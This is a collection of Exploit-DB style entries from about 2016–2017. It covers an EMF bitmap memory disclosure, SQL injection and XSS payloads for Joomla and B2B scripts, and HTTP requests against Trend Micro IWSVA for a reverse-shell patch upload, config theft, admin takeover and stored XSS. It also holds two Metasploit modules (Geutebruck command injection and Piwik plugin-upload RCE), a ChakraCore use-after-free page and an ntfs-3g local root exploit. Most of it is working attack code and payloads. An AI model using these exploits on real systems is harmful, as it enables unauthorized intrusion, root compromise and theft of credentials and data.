In issue #757, I described multiple bugs related to the handling of DIBs (Device Independent Bitmaps) embedded in EMF records, as implemented in the user-mode Windows GDI library (gdi32.dll). As a quick reminder, the DIB-embedding records follow a common scheme: they include four fields, denoting the offsets and lengths of the DIB header and DIB data (named offBmiSrc, cbBmiSrc, offBitsSrc, cbBitsSrc). A correct implementation should verify that:
1) cbBmiSrc is within expected bounds, accounting for the DIB header, color palette etc.
2) the (offBmiSrc, offBmiSrc + cbBmiSrc) region resides within the record buffer's area.
3) cbBitsSrc is within expected bounds, and especially that it is larger or equal the expected number of bitmap bytes.
4) the (offBitsSrc, offBitsSrc + cbBitsSrc) region resides within the record buffer's area.
In the previous bug, I listed various combinations of missing checks in at least 10 different records:
- EMR_ALPHABLEND
- EMR_BITBLT
- EMR_MASKBLT
- EMR_PLGBLT
- EMR_STRETCHBLT
- EMR_TRANSPARENTBLT
- EMR_SETDIBITSTODEVICE
- EMR_STRETCHDIBITS
- EMR_CREATEMONOBRUSH
- EMR_EXTCREATEPEN
As part of MS16-074, some of the bugs were indeed fixed, such as the EMR_STRETCHBLT record, which the original proof-of-concept image relied on. However, we've discovered that not all of the DIB-related problems are gone. For instance, the implementation of EMR_SETDIBITSTODEVICE (residing in the MRSETDIBITSTODEVICE::bPlay function) still doesn't enforce condition #3. As a result, it is possible to disclose uninitialized or out-of-bounds heap bytes via pixel colors, in Internet Explorer and other GDI clients which allow the extraction of displayed image data back to the attacker.
The proof-of-concept file attached here consists of a single EMR_SETDIBITSTODEVICE record (excluding the header/EOF records), which originally contained a 1x1 bitmap. The dimensions of the DIB were then manually altered to 16x16, without adding any more actual image data. As a consequence, the 16x16/24bpp bitmap is now described by just 4 bytes, which is good for only a single pixel. The remaining 255 pixels are drawn based on junk heap data, which may include sensitive information, such as private user data or information about the virtual address space. I have confirmed that the vulnerability reproduces both locally in Internet Explorer, and remotely in Office Online, via a .docx document containing the specially crafted EMF file.
It is strongly advised to perform a careful audit of all EMF record handlers responsible for dealing with DIBs, in order to make sure that each of them correctly enforces all four conditions necessary to prevent invalid memory access (and subsequent memory disclosure) while processing the bitmaps.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41363.zip
# # # # #
# Exploit Title: Joomla! Component JoomBlog v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomblog
# Date: 15.02.2017
# Vendor Homepage: http://joomplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/authoring-a-content/blog/joomblog/
# Demo: http://demo30.joomplace.com/our-products/joomblog/
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomblog&task=tag&tag=Ihsan_Sencan[SQL]
# # # # #
# Exploit Title: [Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x Multiple Vulnerabilities]
# Date: [28/11/2016]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://www.trendmicro.com/us/enterprise/network-security/interscan-web-security/virtual-appliance/]
# Version: [Tested on IWSVA version 6.5-SP2_Build_Linux_1707 and prior versions in 6.5.x series. Older versions may also be affected]
# Tested on: [IWSVA version 6.5-SP2_Build_Linux_1707]
# CVE : [CVE-2016-9269, CVE-2016-9314, CVE-2016-9315, CVE-2016-9316]
# Vendor Security Bulletin: https://success.trendmicro.com/solution/1116672
==================
#Product:-
==================
Trend Micro ‘InterScan Web Security Virtual Appliance (IWSVA)’ is a secure web gateway that combines application control with zero-day exploit detection, advanced anti-malware and ransomware scanning, real-time web reputation, and flexible URL filtering to provide superior Internet threat protection.
==================
#Vulnerabilities:-
==================
Remote Command Execution, Sensitive Information Disclosure, Privilege Escalation and Stored Cross-Site-Scripting (XSS)
========================
#Vulnerability Details:-
========================
#1. Remote Command Execution Vulnerability (CVE-2016-9269):-
The Trend Micro IWSVA can be managed through a web based management console which runs on port#1812. A least privileged user who could just run reports, can run commands on the server as root and gain a root shell.
Proof of Concept:-
a. Download the patch from here.
b. Edit the 'startgate_patch_apply.sh' and add your Kali machine ip to get reverse shell.
c. Calculate the MD5 hash of 'stargate_patch.tgz'
md5sum stargate_patch.tgz
d. Update the 'MD5SUM.txt' with new hash.
e. Listen on port#443 on you Kali machine.
f. Upload the patch to the target server:
http://target_server:1812/servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload
g. You should have a root shell now.
#2. Sensitive Information Disclosure Vulnerability (CVE-2016-9314):-
The web management console allows administrators to backup and download current configuration of the appliance to their local machine. A low privileged user can abuse the ‘ConfigBackup’ functionality to backup system configuration and download it on his local machine. This backup file contains sensitive information like passwd/shadow files, RSA certificates, Private Keys and Default Passphrase etc.
Exploitation:-
A. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=export HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&op=save&uploadfile=&beFullyOrPartially=0
B. Send this POST request to download the backup file from server:
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&op=2&ImEx_success=1&pkg_name=%2Fvar%2Fiwss%2Fmigration%2Fexport%2FIWSVA6.5-SP2_Config.tar%0D%0A&backup_return=
#3. Privilege Escalation Vulnerability (CVE-2016-9315):-
A. Change Master Admin's password:
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=review&allaccount=admin&allaccount=hacker2&allaccount=hacker4&allaccount=hacker&allaccount=test&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=abc123&PASS2=abc123&description=Master+Administrator&role_select=0&roleid=0
B. Add a new administrator account 'hacker'
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=add&allaccount=admin&accountType=local&accountnamelocal=hacker&accounttype=0&password_changed=true&PASS1=pass1234&PASS2=pass1234&description=hackerUser&role_select=1&roleid=1
#4. Stored Cross-Site-Scripting Vulnerability (CVE-2016-9316):-
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 292
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=add&allaccount=admin&accountType=local&accountnamelocal=hacker4"><script>alert(111)</script>&accounttype=0&password_changed=true&PASS1=pass1234&PASS2=pass1234&description=hackerUser4"><script>alert(111)</script>&role_select=1&roleid=1
ii. The script executes when admin visits the ‘Login Accounts’ page.
#Vulnerability Disclosure Timeline:
28/10/2016: First email to disclose the vulnerability to the Trend Micro incident response team
10/11/2016: Second email to ask for acknowledgment
15/11/2016 Acknowledgment from the Trend Micro incident response team for the email reception and saying the vulnerability is under investigation
15/11/2016: CVE Mitre assigned CVE-2016-9269, CVE-2016-9314, CVE-2016-9315 and CVE-2016-9316 for these vulnerabilities.
24/11/2016: Trend Micro incident response team provided a patch for testing.
25/11/2016: Acknowlegdement sent to Trend Micro confirming the fix.
01/12/2016: Third email to ask for remediation status
02/12/2016: Trend Micro incident response team responded stating that the fix will be released by the end of December 2016.
21/12/2016: Fourth email to ask for remediation status
21/12/2016: Trend Micro released the patch for English version.
21/12/2016: Trend Micro incident response team responded stating that the patch for Japanese version will be released in February 2017.
14/02/2017: Trend Micro releases Security Advisory. Link: https://success.trendmicro.com/solution/1116672
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
'Description' => %q{
This module exploits a an arbitrary command execution vulnerability. The
vulnerability exists in the /uapi-cgi/viewer/testaction.cgi page and allows an
anonymous user to execute arbitrary commands with root privileges.
Firmware <= 1.11.0.12 are concerned.
Tested on 5.02024 G-Cam/EFD-2250 running 1.11.0.12 firmware.
},
'Author' =>
[
'Davy Douhine', #CVE-2017-5173 (RCE) and metasploit module
'Florent Montel' #CVE-2017-5174 (Authentication bypass)
'Frederic Cikala' #CVE-2017-5174 (Authentication bypass)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-5173' ],
[ 'CVE', '2017-5174' ],
[ 'URL', 'http://geutebruck.com' ]
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-045-02' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 16 2016'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/testaction.cgi']),
], self.class)
end
def exploit
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} - Attempting to exploit...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'type' => "ip",
'ip' => "eth0 1.1.1.1;#{command}",
},
})
end
end
Exploit Title : Itech scripts B2B Script v4.29 - Multiple Vulnerability
Google Dork : -
Date : 12/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : http://itechscripts.com/b2b-script/
Software Link: http://b2b.itechscripts.com
Type : webapps
Platform: PHP
Version: 4.29
Sofware Price and Demo : $250
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: keywords
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: rctyp
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: rctyp
Method: GET
Payload: <img src=i onerror=prompt(1)>
-----------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: keyword
Method: GET
Payload: <img src=i onerror=prompt(1)>
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/catcompany.php
Vulnerable Parameters: token
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/buyleads-details.php
Vulnerable Parameters: id
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Stored XSS
Vulnerable URL:http://localhost/[PATH]/ajax-file/sendMessage.php
Vulnerable Parameters: msg_message
Method: POST
Payload: <img src=i onerror=prompt(1)>
------------------------------------------------
Type: Stored XSS
Vulnerable URL:http://localhost/[PATH]/my-contactdetails.php
Vulnerable Parameters: fname
Method: POST
Payload: <img src=i onerror=prompt(1)>
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(
info,
'Name' => 'Piwik Superuser Plugin Upload',
'Description' => %q{
This module will generate a plugin, pack the payload into it
and upload it to a server running Piwik. Superuser Credentials are
required to run this module. This module does not work against Piwik 1
as there is no option to upload custom plugins.
Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'FireFart' # Metasploit module
],
'References' =>
[
[ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ]
],
'DisclosureDate' => 'Feb 05 2017',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Piwik', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path of the Piwik installation', '/']),
OptString.new('USERNAME', [true, 'The Piwik username to authenticate with']),
OptString.new('PASSWORD', [true, 'The Piwik password to authenticate with'])
], self.class)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def normalized_index
normalize_uri(target_uri, 'index.php')
end
def get_piwik_version(login_cookies)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'cookie' => login_cookies,
'vars_get' => {
'module' => 'Feedback',
'action' => 'index',
'idSite' => '1',
'period' => 'day',
'date' => 'yesterday'
}
})
piwik_version_regexes = [
/<title>About Piwik ([\w\.]+) -/,
/content-title="About Piwik ([\w\.]+)"/,
/<h2 piwik-enriched-headline\s+feature-name="Help"\s+>About Piwik ([\w\.]+)/m
]
if res && res.code == 200
for r in piwik_version_regexes
match = res.body.match(r)
if match
return match[1]
end
end
end
# check for Piwik version 1
# the logo.svg is only available in version 1
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'themes', 'default', 'images', 'logo.svg')
})
if res && res.code == 200 && res.body =~ /<!DOCTYPE svg/
return "1.x"
end
nil
end
def is_superuser?(login_cookies)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'cookie' => login_cookies,
'vars_get' => {
'module' => 'Installation',
'action' => 'systemCheckPage'
}
})
if res && res.body =~ /You can't access this resource as it requires a 'superuser' access/
return false
elsif res && res.body =~ /id="systemCheckRequired"/
return true
else
return false
end
end
def generate_plugin(plugin_name)
plugin_json = %Q|{
"name": "#{plugin_name}",
"description": "#{plugin_name}",
"version": "#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}",
"theme": false
}|
plugin_script = %Q|<?php
namespace Piwik\\Plugins\\#{plugin_name};
class #{plugin_name} extends \\Piwik\\Plugin {
public function install()
{
#{payload.encoded}
}
}
|
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
zip.add_file("#{plugin_name}/plugin.json", plugin_json)
zip.pack
end
def exploit
print_status('Trying to detect if target is running a supported version of piwik')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index
})
if res && res.code == 200 && res.body =~ /<meta name="generator" content="Piwik/
print_good('Detected Piwik installation')
else
fail_with(Failure::NotFound, 'The target does not appear to be running a supported version of Piwik')
end
print_status("Authenticating with Piwik using #{username}:#{password}...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'vars_get' => {
'module' => 'Login',
'action' => 'index'
}
})
login_nonce = nil
if res && res.code == 200
match = res.body.match(/name="form_nonce" id="login_form_nonce" value="(\w+)"\/>/)
if match
login_nonce = match[1]
end
end
fail_with(Failure::UnexpectedReply, 'Can not extract login CSRF token') if login_nonce.nil?
cookies = res.get_cookies
res = send_request_cgi({
'method' => 'POST',
'uri' => normalized_index,
'cookie' => cookies,
'vars_get' => {
'module' => 'Login',
'action' => 'index'
},
'vars_post' => {
'form_login' => "#{username}",
'form_password' => "#{password}",
'form_nonce' => "#{login_nonce}"
}
})
if res && res.redirect? && res.redirection
# update cookies
cookies = res.get_cookies
else
# failed login responds with code 200 and renders the login form
fail_with(Failure::NoAccess, 'Failed to authenticate with Piwik')
end
print_good('Authenticated with Piwik')
print_status("Checking if user #{username} has superuser access")
superuser = is_superuser?(cookies)
if superuser
print_good("User #{username} has superuser access")
else
fail_with(Failure::NoAccess, "Looks like user #{username} has no superuser access")
end
print_status('Trying to get Piwik version')
piwik_version = get_piwik_version(cookies)
if piwik_version.nil?
print_warning('Unable to detect Piwik version. Trying to continue.')
else
print_good("Detected Piwik version #{piwik_version}")
end
if piwik_version == '1.x'
fail_with(Failure::NoTarget, 'Piwik version 1 is not supported by this module')
end
# Only versions after 3 have a seperate Marketplace plugin
if piwik_version && Gem::Version.new(piwik_version) >= Gem::Version.new('3')
marketplace_available = true
else
marketplace_available = false
end
if marketplace_available
print_status("Checking if Marketplace plugin is active")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'cookie' => cookies,
'vars_get' => {
'module' => 'Marketplace',
'action' => 'index'
}
})
fail_with(Failure::UnexpectedReply, 'Can not check for Marketplace plugin') unless res
if res.code == 200 && res.body =~ /The plugin Marketplace is not enabled/
print_status('Marketplace plugin is not enabled, trying to enable it')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'cookie' => cookies,
'vars_get' => {
'module' => 'CorePluginsAdmin',
'action' => 'plugins'
}
})
mp_activate_nonce = nil
if res && res.code == 200
match = res.body.match(/<a href=['"]index\.php\?module=CorePluginsAdmin&action=activate&pluginName=Marketplace&nonce=(\w+).*['"]>/)
if match
mp_activate_nonce = match[1]
end
end
fail_with(Failure::UnexpectedReply, 'Can not extract Marketplace activate CSRF token') unless mp_activate_nonce
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'cookie' => cookies,
'vars_get' => {
'module' => 'CorePluginsAdmin',
'action' => 'activate',
'pluginName' => 'Marketplace',
'nonce' => "#{mp_activate_nonce}"
}
})
if res && res.redirect?
print_good('Marketplace plugin enabled')
else
fail_with(Failure::UnexpectedReply, 'Can not enable Marketplace plugin. Please try to manually enable it.')
end
else
print_good('Seems like the Marketplace plugin is already enabled')
end
end
print_status('Generating plugin')
plugin_name = Rex::Text.rand_text_alpha(10)
zip = generate_plugin(plugin_name)
print_good("Plugin #{plugin_name} generated")
print_status('Uploading plugin')
# newer Piwik versions have a seperate Marketplace plugin
if marketplace_available
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'cookie' => cookies,
'vars_get' => {
'module' => 'Marketplace',
'action' => 'overview'
}
})
else
res = send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'cookie' => cookies,
'vars_get' => {
'module' => 'CorePluginsAdmin',
'action' => 'marketplace'
}
})
end
upload_nonce = nil
if res && res.code == 200
match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m)
if match
upload_nonce = match[1]
end
end
fail_with(Failure::UnexpectedReply, 'Can not extract upload CSRF token') if upload_nonce.nil?
# plugin files to delete after getting our session
register_files_for_cleanup("plugins/#{plugin_name}/plugin.json")
register_files_for_cleanup("plugins/#{plugin_name}/#{plugin_name}.php")
data = Rex::MIME::Message.new
data.add_part(zip, 'application/zip', 'binary', "form-data; name=\"pluginZip\"; filename=\"#{plugin_name}.zip\"")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalized_index,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookies,
'vars_get' => {
'module' => 'CorePluginsAdmin',
'action' => 'uploadPlugin',
'nonce' => "#{upload_nonce}"
}
)
activate_nonce = nil
if res && res.code == 200
match = res.body.match(/<a.*href="index.php\?module=CorePluginsAdmin&action=activate.+nonce=([^&]+)/)
if match
activate_nonce = match[1]
end
end
fail_with(Failure::UnexpectedReply, 'Can not extract activate CSRF token') if activate_nonce.nil?
print_status('Activating plugin and triggering payload')
send_request_cgi({
'method' => 'GET',
'uri' => normalized_index,
'cookie' => cookies,
'vars_get' => {
'module' => 'CorePluginsAdmin',
'action' => 'activate',
'nonce' => "#{activate_nonce}",
'pluginName' => "#{plugin_name}"
}
}, 5)
end
end
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=983
There is a use-after-free in TypedArray.sort. In TypedArrayCompareElementsHelper (https://chromium.googlesource.com/external/github.com/Microsoft/ChakraCore/+/TimeTravelDebugging/lib/Runtime/Library/TypedArray.cpp), the comparison function is called with the following code:
Var retVal = CALL_FUNCTION(compFn, CallInfo(CallFlags_Value, 3),
undefined,
JavascriptNumber::ToVarWithCheck((double)x, scriptContext),
JavascriptNumber::ToVarWithCheck((double)y, scriptContext));
Assert(TypedArrayBase::Is(contextArray[0]));
if (TypedArrayBase::IsDetachedTypedArray(contextArray[0]))
{
JavascriptError::ThrowTypeError(scriptContext, JSERR_DetachedTypedArray, _u("[TypedArray].prototype.sort"));
}
if (TaggedInt::Is(retVal))
{
return TaggedInt::ToInt32(retVal);
}
if (JavascriptNumber::Is_NoTaggedIntCheck(retVal))
{
dblResult = JavascriptNumber::GetValue(retVal);
}
else
{
dblResult = JavascriptConversion::ToNumber_Full(retVal, scriptContext);
}
The TypeArray is checked to see if it has been detached, but then the return value from the function is converted to an integer, which can invoke valueOf. If this function detaches the TypedArray, one swap is perfomed on the buffer after it is freed.
A minimal PoC is as follows, and a full PoC is attached.
var buf = new ArrayBuffer( 0x10010);
var numbers = new Uint8Array(buf);
function v(){
postMessage("test", "http://127.0.0.1", [buf])
return 7;
}
function compareNumbers(a, b) {
return {valueOf : v};
}
numbers.sort(compareNumbers);
This PoC works on 64-bit systems only.
-->
<html>
<body>
<script>
var buf = new ArrayBuffer( 0x10010);
var numbers = new Uint8Array(buf);
var first = 0;
function v(){
alert("in v");
if( first == 0){
postMessage("test", "http://127.0.0.1", [buf])
first++;
}
return 7;
}
function compareNumbers(a, b) {
alert("in func");
return {valueOf : v};
}
try{
numbers.sort(compareNumbers);
}catch(e){
alert(e.message);
}
</script>
</body>
</html>
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
ntfs-3g is installed by default e.g. on Ubuntu and comes with a
setuid root program /bin/ntfs-3g. When this program is invoked on a
system whose kernel does not support FUSE filesystems (detected by
get_fuse_fstype()), ntfs-3g attempts to load the "fuse" module using
/sbin/modprobe via load_fuse_module().
The issue is that /sbin/modprobe is not designed to run in a setuid
context. As the manpage of modprobe explicitly points out:
The MODPROBE_OPTIONS environment variable can also be used
to pass arguments to modprobe.
Therefore, on a system that does not seem to support FUSE filesystems,
an attacker can set the environment variable MODPROBE_OPTIONS to
something like "-C /tmp/evil_config -d /tmp/evil_root" to force
modprobe to load its configuration and the module from
attacker-controlled directories. This allows a local attacker to load
arbitrary code into the kernel.
In practice, the FUSE module is usually already loaded. However, the
issue can still be attacked because a failure to open
/proc/filesystems (meaning that get_fuse_fstype() returns
FSTYPE_UNKNOWN) always causes modprobe to be executed, even if the
FUSE module is already loaded. An attacker can cause an attempt to
open /proc/filesystems to fail by exhausting the global limit on the
number of open file descriptions (/proc/sys/fs/file-max).
I have attached an exploit for the issue. I have tested it in a VM
with Ubuntu Server 16.10. To reproduce, unpack the attached file,
compile the exploit and run it:
user@ubuntu:~$ tar xf ntfs-3g-modprobe-unsafe.tar
user@ubuntu:~$ cd ntfs-3g-modprobe-unsafe/
user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.8.0-32-generic'
CC [M] /home/user/ntfs-3g-modprobe-unsafe/rootmod.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/user/ntfs-3g-modprobe-unsafe/rootmod.mod.o
LD [M] /home/user/ntfs-3g-modprobe-unsafe/rootmod.ko
make: Leaving directory '/usr/src/linux-headers-4.8.0-32-generic'
depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.order: No such file or directory
depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.builtin: No such file or directory
user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./sploit
looks like we won the race
got ENFILE at 198088 total
Failed to open /proc/filesystems: Too many open files in system
yay, modprobe ran!
modprobe: ERROR: ../libkmod/libkmod.c:514 lookup_builtin_file() could not open builtin file '/tmp/ntfs_sploit.u48sGO/lib/modules/4.8.0-32-generic/modules.builtin.bin'
modprobe: ERROR: could not insert 'rootmod': Too many levels of symbolic links
Error opening '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
Failed to mount '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
we have root privs now...
root@ubuntu:~/ntfs-3g-modprobe-unsafe# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lxd),123(libvirt),127(sambashare),128(lpadmin),1000(user)
Note: The exploit seems to work relatively reliably in VMs with
multiple CPU cores, but not in VMs with a single CPU core. If you
test this exploit in a VM, please ensure that the VM has at least two
CPU cores.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip